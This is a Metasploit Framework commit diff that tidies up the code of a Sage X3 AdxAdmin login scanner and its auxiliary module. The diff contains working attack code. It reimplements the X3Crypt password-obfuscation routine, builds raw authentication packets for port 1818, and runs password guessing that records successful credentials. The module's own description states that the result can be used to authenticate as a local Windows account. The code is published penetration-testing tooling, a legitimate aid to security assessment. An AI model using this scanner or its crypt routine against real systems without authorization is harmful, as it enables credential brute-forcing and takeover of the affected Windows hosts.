Skip to content

Commit

Permalink
Fix a bunch of things
Browse files Browse the repository at this point in the history 
Mostly RuboCop.
  • Loading branch information
@wvu
wvu committed Jul 20, 2021
1 parent 8b50713 commit aefdb8d
Show file tree
Hide file tree
Showing 3 changed files with 100 additions and 116 deletions.
42 changes: 17 additions & 25 deletions lib/metasploit/framework/login_scanner/x3.rb
View file
Original file line number Diff line number Diff line change
@@ -1,7 +1,5 @@
# -*- coding: binary -*-

# require 'msf/core'
# require 'msf/core/exploit/tcp'
require 'metasploit/framework/login_scanner/base'
require 'metasploit/framework/login_scanner/rex_socket'
require 'metasploit/framework/tcp/client'
Expand All @@ -10,44 +8,38 @@ module Metasploit
module Framework
module LoginScanner
class X3

include Metasploit::Framework::LoginScanner::Base
include Metasploit::Framework::LoginScanner::RexSocket
include Metasploit::Framework::Tcp::Client

DEFAULT_PORT = 1818
REALM_KEY = nil

def encrypt_pass(inp)
# check if it's already encrypted
if inp.include?('CRYPT:')
return inp
end
return inp if inp.include?('CRYPT:')

num2 = inp.length
num = 17
ret = ''
charset_0 = 'cromanwqxfzpgedkvstjhyilu'.chars
charset0 = 'cromanwqxfzpgedkvstjhyilu'.chars
xyz = 'zxWyZxzvwYzxZXxxZWWyWxYXz'.chars
charset_1 = 'cf2tln3yuVkDr7oPaQ8bsSd4x'.chars
charset1 = 'cf2tln3yuVkDr7oPaQ8bsSd4x'.chars

(0..num2 - 1).each do |i|
num5 = inp[i].ord
num7 = num5.to_f / num.to_f
num7 = num5.to_f / num
num10 = (num5 % num)
num11 = xyz[i].ord
num12 = num11 - num7
if num12.to_i != num12
num12 += 1
end
num12 += 1 if num12.to_i != num12
ret << num12.to_i.chr
ret << charset_0[num10].ord.chr
off = charset_0.find_index(ret.split('').to_a[-1])
if off & 1 == 0
ret << charset_1[off].ord.chr
end
ret << charset0[num10].ord.chr
off = charset0.find_index(ret.split('').to_a[-1])
ret << charset1[off].ord.chr if (off & 1).zero?
end
ret = 'CRYPT:' + ret
return ret

"CRYPT:#{ret}"
end

def attempt_login(credential)
Expand Down Expand Up @@ -77,19 +69,18 @@ def attempt_login(credential)
auth_buffer << t_auth_buffer.length
auth_buffer << t_auth_buffer

# add the password

begin
connect
select([sock], nil, nil, 0.4)

if enc_pass
sock.put(auth_buffer)
result_options[:proof] = sock.get_once(1024, 2)
if result_options[:proof] && result_options[:proof].length == 4
if result_options[:proof].chars != ["\xFF","\xFF","\xFF","\xFF"]
result_options[:status] = Metasploit::Model::Login::Status::SUCCESSFUL
end

if result_options[:proof] && result_options[:proof].length == 4 && (result_options[:proof].chars != [
"\xFF", "\xFF", "\xFF", "\xFF"
])
result_options[:status] = Metasploit::Model::Login::Status::SUCCESSFUL
end
end
rescue Rex::ConnectionError, EOFError, Timeout::Error, Errno::EPIPE => e
Expand All @@ -111,6 +102,7 @@ def set_sane_defaults
self.connection_timeout ||= 5
self.port ||= DEFAULT_PORT
end

end
end
end
Expand Down
37 changes: 18 additions & 19 deletions ...s/auxiliary/scanner/x3/x3_adxsrv_login.rb → ...auxiliary/scanner/sage/x3_adxsrv_login.rb
View file
Original file line number Diff line number Diff line change
@@ -1,5 +1,11 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'metasploit/framework/login_scanner/x3'
require 'metasploit/framework/credential_collection'

class MetasploitModule < Msf::Auxiliary

include Msf::Auxiliary::Scanner
Expand All @@ -11,18 +17,18 @@ def initialize(_info = {})
super(
'Name' => 'Sage X3 AdxAdmin Login Scanner',
'Description' => %q{
This module allows an attacker to perform a password guessing attack against
the Sage X3 AdxAdmin service which in turn can be used to authenticate against
as a local windows account.
This module allows an attacker to perform a password guessing attack against
the Sage X3 AdxAdmin service, which in turn can be used to authenticate against
as a local Windows account.
This module implements the X3Crypt function to 'encrypt' any passwords to
be used during the authentication process, provided a plaintext password.
This module implements the X3Crypt function to 'encrypt' any passwords to
be used during the authentication process, given a plaintext password.
},
'Author' => ['Jonathan Peterson <deadjakk[at]shell.rip>'], # @deadjakk
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/'],
['URL', 'https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/']
]
)

Expand All @@ -34,12 +40,7 @@ def initialize(_info = {})
]
)

deregister_options('PASSWORD_SPRAY')
deregister_options('BLANK_PASSWORDS')
end

def target
"#{rhost}:#{rport}"
deregister_options('PASSWORD_SPRAY', 'BLANK_PASSWORDS')
end

def run_host(ip)
Expand Down Expand Up @@ -73,24 +74,22 @@ def run_host(ip)
module_fullname: fullname,
workspace_id: myworkspace_id
)

case result.status
when Metasploit::Model::Login::Status::SUCCESSFUL
print_brute level: :good, ip: ip, msg: "Success: '#{result.credential}'"
print_brute(level: :good, ip: ip, msg: "Success: '#{result.credential}'")
credential_core = create_credential(credential_data)
credential_data[:core] = credential_core
create_credential_login(credential_data)
next
when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
if datastore['VERBOSE']
print_brute level: :verror, ip: ip, msg: "Could not connect: #{result.proof}"
end
vprint_brute(level: :verror, ip: ip, msg: "Could not connect: #{result.proof}")
when Metasploit::Model::Login::Status::INCORRECT
if datastore['VERBOSE']
print_brute level: :verror, ip: ip, msg: "Failed: '#{result.credential}'"
end
vprint_brute(level: :verror, ip: ip, msg: "Failed: '#{result.credential}'")
end

invalidate_login(credential_data)
end
end

end
Loading

0 comments on commit aefdb8d

Please sign in to comment.